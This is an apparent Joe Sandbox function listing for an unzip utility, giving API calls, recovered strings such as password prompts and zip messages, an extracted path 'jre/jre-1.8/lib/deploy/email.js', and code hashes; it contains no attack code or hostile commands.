jre/jre-1.8/lib/deploy/email.js, xrefs: 00403DE0

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: freemalloc$strcpystrlen
String ID: %$Q$jre/jre-1.8/lib/deploy/email.js
API String ID: 3801647175-3762570836
Opcode ID: 30816e5812bea1ec718ee45f33fbf4892776f9d0ce27dec28ec06225b85e4484
Instruction ID: 9f9128b2a00fdacce740a1f718f2f9d77e9774934130d4eb328a067bef8e83bc
Opcode Fuzzy Hash: 30816e5812bea1ec718ee45f33fbf4892776f9d0ce27dec28ec06225b85e4484
Instruction Fuzzy Hash: 3241B1706247038BDB00DF26D88475BBBE5BB84305F51993EE496A7391CBB8C9428B8D

Function 0041C140 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

IsValidSecurityDescriptor.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041AB05), ref: 0041C183
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041AB05), ref: 0041C1AC
IsValidAcl.ADVAPI32 ref: 0041C1C9
GetSecurityDescriptorSacl.ADVAPI32 ref: 0041C1E6
IsValidAcl.ADVAPI32 ref: 0041C207
GetSecurityDescriptorOwner.ADVAPI32 ref: 0041C228
IsValidSid.ADVAPI32 ref: 0041C245
GetSecurityDescriptorGroup.ADVAPI32 ref: 0041C262

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$Valid$DaclGroupOwnerSacl
String ID:
API String ID: 1883972384-0
Opcode ID: 129813b6d2e783ae8836d7a99dfea360ca89916a3e67cda2545cfe39e2f7c253
Instruction ID: df1f253b4333b31f5d6ee0a233159ae63344bdb012e98dabfaeb503e6c3c0527
Opcode Fuzzy Hash: 129813b6d2e783ae8836d7a99dfea360ca89916a3e67cda2545cfe39e2f7c253
Instruction Fuzzy Hash: 133100B0A487129BD700FF3A898516BBBE5BFC4B44F44992EEC8493305DA78D9458F4B

Function 0041443C Relevance: 13.5, APIs: 2, Strings: 7, Instructions: 44COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00414485
sprintf.MSVCRT ref: 004144EA

Strings

this zipfile, out of a total of %u %s. The entire central directory is %lu (%.8lXh) bytes long, and its offset in bytes from, xrefs: 004144DB
entry, xrefs: 004144C4
the beginning of the zipfile in which it begins is %lu (%.8lXh)., xrefs: 00414510
%, xrefs: 0041449E, 00414503
This zipfile constitutes disk %u of a multi-part archive. The central directory starts on disk %u; %u of its entries %s contained within, xrefs: 00414469
entries, xrefs: 004144CB
are, xrefs: 00414452

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: This zipfile constitutes disk %u of a multi-part archive. The central directory starts on disk %u; %u of its entries %s contained within$ the beginning of the zipfile in which it begins is %lu (%.8lXh).$ this zipfile, out of a total of %u %s. The entire central directory is %lu (%.8lXh) bytes long, and its offset in bytes from$%$are$entries$entry
API String ID: 590974362-2266057813
Opcode ID: fae0896652cad0acbcc83e0cf4209a145ca4b35f919efc682d866391f9e58477
Instruction ID: a46afd99698e33691170b3eb6d206440d4a07dec5da07c57ebbf299a82a3bfe1
Opcode Fuzzy Hash: fae0896652cad0acbcc83e0cf4209a145ca4b35f919efc682d866391f9e58477
Instruction Fuzzy Hash: 7F11B3B0509721ABC3149F0AE15426ABBE0EBD4744F90C82FF4C99B350DBBC8885DB5A

Function 0041435C Relevance: 13.5, APIs: 4, Strings: 5, Instructions: 43COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00414345
sprintf.MSVCRT ref: 00414376
sprintf.MSVCRT ref: 004143AB
sprintf.MSVCRT ref: 00414400

Strings

====, xrefs: 0041439C
The zipfile comment is truncated., xrefs: 0041442E
%, xrefs: 0041438F, 004143C4, 00414419
The zipfile comment is %u bytes long and contains the following text:, xrefs: 00414360
====, xrefs: 004143F1

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf
String ID: The zipfile comment is truncated.$ The zipfile comment is %u bytes long and contains the following text:$%$====$====
API String ID: 590974362-3330848885
Opcode ID: d01045a83ce3daf23a6273d51809fbfe5e29910c068bbdc9f91c0962c12962bb
Instruction ID: fe77db28b683637f11810b24407a5c1b9657d7c76e1fee013fc458959c105211
Opcode Fuzzy Hash: d01045a83ce3daf23a6273d51809fbfe5e29910c068bbdc9f91c0962c12962bb
Instruction Fuzzy Hash: EA1177B010A720EAC3009F56E15436EBBE0EB94754F80C81EE8D856251DBBD8484DF9A

Function 00419084 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 316COMMON

Download Yara Rule

APIs

mblen.MSVCRT ref: 00419253
_isctype.MSVCRT ref: 004192DE
sprintf.MSVCRT ref: 0041933B

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00419314
%, xrefs: 00419354
jre/jre-1.8/lib/deploy/email.js, xrefs: 00419281, 0041931C
mapname: conversion of %s failed, xrefs: 0041932C

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _isctypemblensprintf
String ID: %$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js$mapname: conversion of %s failed
API String ID: 2327759084-2432968685
Opcode ID: 291d3d482d6d96fa6553d22f1dae0961dd1a6607f606dd384784faf1058ff0c2
Instruction ID: 8abee0a8daa1113ca9267eefd0849b2d57c33d508817b07f526b8506cdfe6f5e
Opcode Fuzzy Hash: 291d3d482d6d96fa6553d22f1dae0961dd1a6607f606dd384784faf1058ff0c2
Instruction Fuzzy Hash: 6FB1822058F3C55FF30A87214BAA299BF54DF62724F6849EED4C21B5B3C62C488BC746

Function 0040A4C0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABE3
%, xrefs: 0040AC23
%s: write error (disk full?). Continue? (y/n/^C) , xrefs: 0040ABFB
jre/jre-1.8/lib/deploy/email.js, xrefs: 0040ABEB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID:
String ID: %$%s: write error (disk full?). Continue? (y/n/^C) $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 0-2870516294
Opcode ID: 6a279aec9d66e2b8ab51001334dc69cedd27aeadeaa5a57cce9aa80c7f856b8b
Instruction ID: b0a230a396e0e215309421c8ca4803544ccdc3ce813721ca778f38ec9955b70f
Opcode Fuzzy Hash: 6a279aec9d66e2b8ab51001334dc69cedd27aeadeaa5a57cce9aa80c7f856b8b
Instruction Fuzzy Hash: E6717E706083019BC314DF19D58422BBBE1BBD8714F15893FE48967391DB789D55CB4B

Function 00411AE0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00411B12
fputs.MSVCRT ref: 00411B27
fflush.MSVCRT ref: 00411B38

Part of subcall function 0041AEC0: CreateFileA.KERNEL32 ref: 0041AF0B
Part of subcall function 0041AEC0: GetConsoleMode.KERNEL32 ref: 0041AF2A
Part of subcall function 0041AEC0: ReadFile.KERNEL32 ref: 0041AF5D
Part of subcall function 0041AEC0: SetConsoleMode.KERNEL32 ref: 0041AF80
Part of subcall function 0041AEC0: CloseHandle.KERNEL32 ref: 0041AF8B

fflush.MSVCRT ref: 00411B8D
_flsbuf.MSVCRT ref: 00411BBC

Strings

(line too long--try again), xrefs: 00411B97
Enter password: , xrefs: 00411AE8

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: ConsoleFileModefflushfputs$CloseCreateHandleRead_flsbuf
String ID: (line too long--try again)$Enter password:
API String ID: 441913591-3227222613
Opcode ID: b24524fe0e954cadc4025fea1547a3f4b34ed8051a3ca50d36f35ff48e37f3ed
Instruction ID: cd7c784af3bb83a6929e3c0fe059c00125bdca14144ae4986cf804cc9c267b80
Opcode Fuzzy Hash: b24524fe0e954cadc4025fea1547a3f4b34ed8051a3ca50d36f35ff48e37f3ed
Instruction Fuzzy Hash: F121D3302097008BD7149F25D4803ABBBE1FB81348F95C46ED68517365D239F886CB8E

Function 0040BD49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 0040BC9A
fflush.MSVCRT ref: 0040BCAB
fprintf.MSVCRT ref: 0040BCF4
fflush.MSVCRT ref: 0040BD05
tolower.MSVCRT ref: 0040BD10

Part of subcall function 0041AEC0: CreateFileA.KERNEL32 ref: 0041AF0B
Part of subcall function 0041AEC0: GetConsoleMode.KERNEL32 ref: 0041AF2A
Part of subcall function 0041AEC0: ReadFile.KERNEL32 ref: 0041AF5D
Part of subcall function 0041AEC0: SetConsoleMode.KERNEL32 ref: 0041AF80
Part of subcall function 0041AEC0: CloseHandle.KERNEL32 ref: 0041AF8B

fputc.MSVCRT ref: 0040BD64

Strings

, xrefs: 0040BCE0

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: ConsoleFileModefflushfprintf$CloseCreateHandleReadfputctolower
String ID:
API String ID: 3122068109-894331677
Opcode ID: abff15262d95bb804b5987725c2bc71508273f63c1b8e0eef99bdddeb6d82929
Instruction ID: 40c0483ad61c17da99a77d23fc38f8c77a3f8a258a7b3fd00db7ecb7be3ebfa1
Opcode Fuzzy Hash: abff15262d95bb804b5987725c2bc71508273f63c1b8e0eef99bdddeb6d82929
Instruction Fuzzy Hash: 951133716497149BE724AF28E8853ABB792EF81304FC5882FD4C527395C7389C958BCE

Function 0040E41C Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 222stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 0040E018
sprintf.MSVCRT ref: 0040E235
sprintf.MSVCRT ref: 0040E2CE
sprintf.MSVCRT ref: 0040E446

Strings

gfff, xrefs: 0040E1A0
%, xrefs: 0040E2E9
, xrefs: 0040E195

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$strncmp
String ID: $%$gfff
API String ID: 898905134-1855930254
Opcode ID: cbffe8f9d95c8f0c580a62ca6b4b15a9635acf533bb1d6ec69ab3a34aba40670
Instruction ID: cab289e815521018f7db64d3d8fd6b7e3fbdb72386586a01fd11dfca8c434a26
Opcode Fuzzy Hash: cbffe8f9d95c8f0c580a62ca6b4b15a9635acf533bb1d6ec69ab3a34aba40670
Instruction Fuzzy Hash: C7A159719097618BC324DF26D58032BFBE1BF94704F448D2EE8D8A7391DB789845CB8A

Function 00418380 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 104stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 004183F6
strcpy.MSVCRT ref: 00418419
sprintf.MSVCRT ref: 004184B5
sprintf.MSVCRT ref: 0041850E

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 004184E7
%-22s , xrefs: 004184FF
%, xrefs: 004184CE, 00418527
jre/jre-1.8/lib/deploy/email.js, xrefs: 004183AE, 004183EA, 00418411, 00418456, 004184EF

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$mallocstrcpy
String ID: %$%-22s $jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 2998919953-1719485714
Opcode ID: 52dd23109967304cc0a6efc3ef866bae037a2fc4dae8be7614663cc2e7a0425b
Instruction ID: 42920fc7534ca5a482034d9446c2bbf9f617ccee39202895d665fffdd584ca24
Opcode Fuzzy Hash: 52dd23109967304cc0a6efc3ef866bae037a2fc4dae8be7614663cc2e7a0425b
Instruction Fuzzy Hash: DD4151B06097019BC714DF25D5842AABBE1FF94304F51C82EE8C94B315EB7C9885DB9A

Function 0041C17C Relevance: 12.1, APIs: 8, Instructions: 86COMMON

Download Yara Rule

APIs

IsValidSecurityDescriptor.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041AB05), ref: 0041C183
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041AB05), ref: 0041C1AC
IsValidAcl.ADVAPI32 ref: 0041C1C9
GetSecurityDescriptorSacl.ADVAPI32 ref: 0041C1E6
IsValidAcl.ADVAPI32 ref: 0041C207
GetSecurityDescriptorOwner.ADVAPI32 ref: 0041C228
IsValidSid.ADVAPI32 ref: 0041C245
GetSecurityDescriptorGroup.ADVAPI32 ref: 0041C262

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$Valid$DaclGroupOwnerSacl
String ID:
API String ID: 1883972384-0
Opcode ID: 71c4f1013a8e22638cdae407088346b7795bb0b2b562776404f88c3787941161
Instruction ID: 3218281d8d78fb1052afee7cf83ac79af1db5687bba4ddb199fcf7bce1108985
Opcode Fuzzy Hash: 71c4f1013a8e22638cdae407088346b7795bb0b2b562776404f88c3787941161
Instruction Fuzzy Hash: 5E3142B1A487129BD700FF3A898516BB7E5BFC4B84F44C92EAC8493305DA78D945CF4A

Function 00422D10 Relevance: 11.5, APIs: 9, Instructions: 281stringCOMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00422E2F
strlen.MSVCRT ref: 00422E45
malloc.MSVCRT ref: 00422E54
strlen.MSVCRT ref: 00422EBB
malloc.MSVCRT ref: 00422ECA
strlen.MSVCRT ref: 00422F37
malloc.MSVCRT ref: 00422F46
strlen.MSVCRT ref: 00422FBF
malloc.MSVCRT ref: 00422FCE

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: mallocstrlen$sprintf
String ID:
API String ID: 3442674729-0
Opcode ID: 58cfe18254602f8972d6a9e766af354c8a5b5c83a28b7fafbd7aba44f1ce5c1a
Instruction ID: 572ecb02e79b41ef670c10adca7534e6a9f6324388578024f915b0fbff6e9455
Opcode Fuzzy Hash: 58cfe18254602f8972d6a9e766af354c8a5b5c83a28b7fafbd7aba44f1ce5c1a
Instruction Fuzzy Hash: 58A16E202087A19ED7168F2DA580366FBE1BF9B340FD884CAD4D54B356D2BC4986DB1B

Function 00402709 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

mblen.MSVCRT ref: 00402737
sprintf.MSVCRT ref: 004028B8
sprintf.MSVCRT ref: 0040290F

Strings

`pB, xrefs: 00402950, 004029EA
%, xrefs: 004027BD, 004027F7, 0040282F, 0040284D, 004028D1, 00402928, 004029D1
\pB, xrefs: 00402710, 00402745, 00402751, 004027AD, 00402817, 00402866, 004028F2, 0040299E, 00402A07

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: sprintf$mblen
String ID: %$\pB$`pB
API String ID: 1822197146-765680657
Opcode ID: 4f091c3aa7ec78d666f1f4344b3d607f6a111a77b87726e1f44409e53abd2f80
Instruction ID: 7e9ad0c050573f2186bfe42d504659dc32488ef6442f2a6868b876462cc61641
Opcode Fuzzy Hash: 4f091c3aa7ec78d666f1f4344b3d607f6a111a77b87726e1f44409e53abd2f80
Instruction Fuzzy Hash: 25819170A09302CFD720EF15D54421BBBE1FB98344F54857EE9846B3A1EBB4A906CF89

Function 00421F77 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00421FF3
DeviceIoControl.KERNEL32 ref: 00422055
CloseHandle.KERNEL32 ref: 00422062
_errno.MSVCRT ref: 0042207C
GetDiskFreeSpaceA.KERNEL32 ref: 004220FF

Strings

,, xrefs: 00422016

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceDiskFileFreeHandleSpace_errno
String ID: ,
API String ID: 1830653778-3772416878
Opcode ID: 2a182280008a14be2b5832bebc3e728b6a01fe6acb2dfd3ff3c7c2625bb5c197
Instruction ID: f5e75828edd030cdc060b9064f6337da5cc59853295c1157a159fe04a4f84662
Opcode Fuzzy Hash: 2a182280008a14be2b5832bebc3e728b6a01fe6acb2dfd3ff3c7c2625bb5c197
Instruction Fuzzy Hash: 824134B06083509FE320EF29D18474BFBE1BF84358F51891EE98887351D7B99948CB87

Function 0041AEC0 Relevance: 10.6, APIs: 7, Instructions: 78fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 0041AF0B
GetConsoleMode.KERNEL32 ref: 0041AF2A
ReadFile.KERNEL32 ref: 0041AF5D
SetConsoleMode.KERNEL32 ref: 0041AF80
CloseHandle.KERNEL32 ref: 0041AF8B
SetConsoleMode.KERNEL32 ref: 0041AFEB

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: ConsoleMode$File$CloseCreateHandleRead
String ID:
API String ID: 4240036980-0
Opcode ID: 79a4b591a14d1b52bd22dc21c4e242c2779401bdbaf647accf523a0b27cb3933
Instruction ID: eb4a81c16360c2cecfc54998e8aea82a1649ccd6584f03b0bf96fa2b697c72de
Opcode Fuzzy Hash: 79a4b591a14d1b52bd22dc21c4e242c2779401bdbaf647accf523a0b27cb3933
Instruction Fuzzy Hash: F3317EB05093009AC300AF3AD54436BBAE4AF8436CF018B1EF8D856296D379D999CB97

Function 00408580 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

sprintf.MSVCRT ref: 00409061
_setmode.MSVCRT ref: 004090B7

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 00408E20, 00409022
%, xrefs: 00408E60, 0040907A
jre/jre-1.8/lib/deploy/email.js, xrefs: 00408E28, 0040902A

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: _setmodesprintf
String ID: %$jre/jre-1.8/lib/deploy/email.js$jre/jre-1.8/lib/deploy/email.js
API String ID: 857852225-1688794020
Opcode ID: 39e5a3ebea5c1331cfbadb6d215aaa4a22fe2be37ae6a9d0b7b7904ea8e98b57
Instruction ID: 0e67c2c2037670a69ae418f0563910655aefb3eacb04df9dc99223872401be3a
Opcode Fuzzy Hash: 39e5a3ebea5c1331cfbadb6d215aaa4a22fe2be37ae6a9d0b7b7904ea8e98b57
Instruction Fuzzy Hash: A1310AB060A711DBC304EF25E94421ABAE1FB94344F50D83EE48597391DBB88845DF9E

Function 0040B030 Relevance: 10.6, APIs: 3, Strings: 4, Instructions: 62COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0040B07A
malloc.MSVCRT ref: 0040B0C2
sprintf.MSVCRT ref: 0040B10C

Strings

jre/jre-1.8/lib/deploy/email.js, xrefs: 0040B0E1
[%s] %s password: , xrefs: 0040B101
password incorrect--reenter: , xrefs: 0040B056
Enter password: , xrefs: 0040B0B6

Memory Dump Source

Source File: 0000000F.00000002.3163646342.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.3163625652.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.0000000000427000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163675796.000000000043A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.3163725313.000000000043C000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_unzip.jbxd

Yara matches

Similarity

API ID: freemallocsprintf
String ID: Enter password: $[%s] %s password: $jre/jre-1.8/lib/deploy/email.js$password incorrect--reenter:
API String ID: 887708770-437042146
Opcode ID: e0aef5a26453d62f1b43206a77658e97957866e4583763a3b3804411b5e6650a
Instruction ID: c8cbb495fe3a45a79f33d43274ed46dfd3832f2cda984e725f827582cf5dfae8
Opcode Fuzzy Hash: e0aef5a26453d62f1b43206a77658e97957866e4583763a3b3804411b5e6650a
Instruction Fuzzy Hash: 4321E9706097109BC310EF16C18021BFBE1BF89754F958A2EE9D8A7382D778DD41CB8A

Function 00410C83 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

_close.MSVCRT ref: 00410A5B
sprintf.MSVCRT ref: 00410CB4
